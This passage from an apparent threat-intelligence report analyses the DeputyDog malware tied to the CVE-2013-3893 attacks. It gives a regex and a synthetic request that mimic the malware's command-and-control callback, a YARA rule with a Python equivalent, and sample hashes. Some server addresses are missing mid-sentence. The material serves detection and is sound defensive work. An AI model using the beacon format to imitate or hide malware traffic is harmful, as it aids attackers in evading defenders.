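# Assuming an alphanumeric 8-character field; adjust if samples differ.
AGTID_RE = re.compile(r"^Agtid: ([0-9A-Za-z]{8})08x\r?$", re.MULTILINE)

# Synthetic request mimicking the observed callback pattern.
request = (
    "POST /info.asp HTTP/1.1\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "Agtid: abcd123408x\r\n"
    "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)\r\n"
)

match = AGTID_RE.search(request)
```

Matching on a protocol quirk like this is brittle (the actor can trivially change it), but it is cheap to deploy alongside the network indicators above.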

              A second related sample was also delivered from on September 5, 2013. The sun.css file was a malicious executable with an MD5 of bd07926c72739bb7121cec8a2863ad87 and it communicated with the same communications protocol described above to the same command and control server at

              Related Samples

              We found that both droppers, bd07926c72739bb7121cec8a2863ad87 and 8aba4b5184072f2a50cbc5ecfe326701, were compiled on 2013-08-19 at 13:21:59 UTC. As we examined these files, we noticed a unique fingerprint.

              These samples both had a string that may have been an artifact of the builder used to create the binaries. This string was “DGGYDSYRL”, which we refer to as “DeputyDog”. As such, we developed the following YARA signature, based on this unique attribute:

              rule APT_DeputyDog_Strings
              {
                  meta:
                      author = "FireEye Labs"
                      version = "1.0"
                      description = "detects string seen in samples used in 2013-3893 0day attacks"
                      reference = "8aba4b5184072f2a50cbc5ecfe326701"
                  strings:
                      $mz = {4d 5a}
                      $a = "DGGYDSYRL"
                  condition:
                      ($mz at 0) and $a
              }

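              For environments without the YARA bindings installed, the rule's logic can be approximated in plain Python. This is a sketch of the same two conditions, not a replacement for scanning with YARA itself:

```python
def matches_deputydog(data: bytes) -> bool:
    """Pure-Python equivalent of the YARA rule above: an MZ header at
    offset 0 and the builder artifact string anywhere in the file."""
    return data[:2] == b"MZ" and b"DGGYDSYRL" in data
```

With the real yara-python bindings, the same check would be performed by compiling the rule and calling its match method against each file; the sketch above simply avoids that dependency.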
              We used this signature to identify 5 other potentially related samples:

              MD5 Compile Time (UTC) C2 Server
              58dc05118ef8b11dcb5f5c596ab772fd 2013-08-19 13:21:58
              4d257e569539973ab0bbafee8fb87582 2013-08-19 13:21:58
              dbdb1032d7bb4757d6011fb1d077856c